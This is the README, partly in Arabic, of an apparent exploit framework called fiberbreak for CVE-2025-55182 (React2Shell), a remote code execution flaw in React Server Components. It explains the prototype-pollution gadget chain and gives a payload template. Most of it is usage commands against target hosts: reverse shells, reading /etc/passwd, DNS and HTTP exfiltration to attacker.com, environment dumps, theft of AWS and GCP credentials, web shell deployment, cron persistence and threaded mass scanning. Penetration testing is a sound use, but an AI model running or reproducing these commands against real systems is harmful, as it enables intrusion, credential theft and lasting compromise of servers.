
أداة استغلال React2Shell (CVE-2025-55182)
إطار عمل استغلال لـ CVE-2025-55182 (React2Shell) - ثغرة تنفيذ كود عن بُعد (RCE) حرجة في مكونات خادم React.
# Clone repository
git clone https://github.com/scumfrog/fiberbreak
cd fiberbreak
# Install dependencies
pip install -r requirements.txt
# Make executable
chmod +x fiberbreak.py
# Build vulnerable testing environment
docker-compose up -d
# Wait for startup
sleep 20
# Test detection
./fiberbreak.py -u http://localhost:3000 detect
# Execute RCE
./fiberbreak.py -u http://localhost:3000 exploit -c "whoami"
# Verify
docker exec react2shell-lab ls -la /tmp/
CVE-2025-55182 هي ثغرة تنفيذ كود عن بُعد حرجة في مكونات خادم React (RSC) تتيح للمهاجمين غير المصادق عليهم تنفيذ كود تعسفي على الخادم.
السبب الجذري: يقوم بروتوكول React Flight بإلغاء تسلسل مدخلات العميل غير الموثوقة دون تحقق مناسب، مما يسمح للمهاجمين بصياغة حمولات خبيثة تستغل سلسلة النماذج الأولية في JavaScript ومنشئ الدوال (Function).
ناقل الهجوم: يرسل المهاجمون طلب POST مُصممًا بعناية من نوع multipart/form-data مع ترويسة Next-Action إلى أي نقطة نهاية RSC. تستغل الحمولة الخبيثة ما يلي:
__proto__constructor:constructor1. Attacker sends crafted POST request
└─ multipart/form-data with malicious JSON
└─ Next-Action header (any value)
2. Server deserializes payload
└─ React processes RSC chunk format
└─ Resolves Promise-like object
3. Gadget chain triggers
└─ __proto__ access bypasses hasOwnProperty checks
└─ constructor:constructor exposes Function()
└─ _prefix executes arbitrary code
4. RCE achieved
└─ Server executes attacker's JavaScript
└─ Full system compromise
{
"then": "$1:__proto__:then", // Prototype pollution
"status": "resolved_model", // Fake React internal state
"reason": -1, // Trigger resolution
"value": '{"then":"$B1337"}', // Blob reference
"_response": {
"_prefix": "MALICIOUS_CODE_HERE;", // Executed code
"_formData": {
"get": "$1:constructor:constructor" // Function() access
}
}
}
// react-server-dom-webpack/src/ReactFlightClient.js
function resolveModelChunk(chunk) {
const value = JSON.parse(chunk.value);
// Missing validation here allows malicious chunks
if (value && typeof value.then === 'function') {
// Attacker controls 'then' method
value.then(/* ... */);
}
}
# Single target detection
./fiberbreak.py -u https://target.com detect
# Multiple targets from file
./fiberbreak.py -l targets.txt detect --threads 20
# Save results to JSON
./fiberbreak.py -l targets.txt detect -o results.json
# Disable SSL verification
./fiberbreak.py -u https://target.com detect --no-verify-ssl
# Simple blind command execution
./fiberbreak.py -u https://target.com exploit -c "whoami"
# Write file to disk
./fiberbreak.py -u https://target.com exploit \
-c "/tmp/pwned.txt:HACKED" -t write_file
# Read file contents
./fiberbreak.py -u https://target.com exploit \
-c "/etc/passwd:https://attacker.com" -t file_read
# Reverse shell
./fiberbreak.py -u https://target.com exploit \
-c "10.10.10.10:4444" -t reverse_shell
# DNS exfiltration (stealthy, no HTTP traffic)
./fiberbreak.py -u https://target.com exploit \
-c "whoami:attacker.oastify.com" -t dns_exfil
# HTTP exfiltration with output
./fiberbreak.py -u https://target.com exploit \
-c "id:https://attacker.com/exfil" -t http_exfil
# Environment variable dump
./fiberbreak.py -u https://target.com exploit \
-c "https://attacker.com/env" -t env_dump
# System reconnaissance
./fiberbreak.py -u https://target.com exploit \
-c "https://attacker.com/recon" -t recon
# Stealth DNS beacon (no command output)
./fiberbreak.py -u https://target.com exploit \
-c "attacker.oastify.com" -t stealth_beacon
# Auto-detect cloud provider and extract credentials
# Supports: AWS, GCP, Azure, DigitalOcean, Oracle Cloud, Alibaba Cloud
./fiberbreak.py -u https://target.com exploit \
-c "https://attacker.com/cloud" -t cloud_metadata
| النوع | الصيغة | الوصف | المخرجات |
|---|---|---|---|
simple | command | تنفيذ أي أمر قشرة | أعمى (بدون إخراج) |
output | command + --callback | تنفيذ مع استدعاء HTTP | نعم |
reverse_shell | lhost:lport | قشرة عكسية Bash | تفاعلي |
dns_exfil | cmd:domain أو domain | تسريب عبر DNS | سجلات DNS |
http_exfil | cmd:callback_url | تسريب عبر HTTP | HTTP POST |
file_read | filepath:callback | قراءة ملف وتسريبه | HTTP POST |
write_file | filepath:content | كتابة ملف على القرص | أعمى (بدون إخراج) |
env_dump | callback_url | تفريغ متغيرات البيئة | HTTP POST |
cloud_metadata | callback_url | استخراج بيانات اعتماد السحابة | HTTP POST |
recon | callback_url | استطلاع النظام | HTTP POST |
stealth_beacon | domain | منارة DNS خفية | سجلات DNS |
webshell | filepath | نشر قشرة ويب Node.js | المنفذ 8080 |
persist | callback_url | تثبيت استمرارية عبر cron | وظيفة cron |
# 1. Stealthy detection with DNS beacon
./fiberbreak.py -u https://target.com exploit \
-c "recon.yourburp.oastify.com" -t stealth_beacon
# 2. If vulnerable, extract sensitive data
./fiberbreak.py -u https://target.com exploit \
-c "https://yourserver.com/exfil" -t env_dump
# 3. Check for cloud environment
./fiberbreak.py -u https://target.com exploit \
-c "https://yourserver.com/cloud" -t cloud_metadata
# 4. Document findings without causing damage
# Phase 1: Detection
./fiberbreak.py -u https://target.com detect -o detection.json
# Phase 2: Verification
./fiberbreak.py -u https://target.com exploit \
-c "/tmp/pentest_proof.txt:PENTEST_$(date +%s)" -t write_file
# Phase 3: Impact Assessment
./fiberbreak.py -u https://target.com exploit \
-c "https://pentest-server.com/impact" -t recon
# Phase 4: Credential Extraction (if cloud)
./fiberbreak.py -u https://target.com exploit \
-c "https://pentest-server.com/creds" -t cloud_metadata
# Phase 5: Interactive Access (if authorized)
# Terminal 1: Start listener
nc -lvnp 4444
# Terminal 2: Get shell
./fiberbreak.py -u https://target.com exploit \
-c "YOUR_IP:4444" -t reverse_shell
# Create target list
cat > targets.txt << EOF
https://app1.company.com
https://app2.company.com
https://app3.company.com
https://api.company.com
EOF
# Scan all targets in parallel
./fiberbreak.py -l targets.txt detect --threads 50 -o scan_results.json
# Filter vulnerable targets
cat scan_results.json | jq '.[] | select(.vulnerable==true) | .url'
# Generate report
cat scan_results.json | jq '{
total: length,
vulnerable: [.[] | select(.vulnerable==true)] | length,
targets: [.[] | select(.vulnerable==true) | .url]
}'
# AWS EC2 Instance
./fiberbreak.py -u https://aws-app.com exploit \
-c "https://attacker.com/aws" -t cloud_metadata
# Callback receives:
# - Instance ID, region, availability zone
# - IAM role name
# - Temporary AWS credentials (AccessKeyId, SecretAccessKey, Token)
# - User data
# - Network configuration
# GCP Compute Engine
./fiberbreak.py -u https://gcp-app.com exploit \
-c "https://attacker.com/gcp" -t cloud_metadata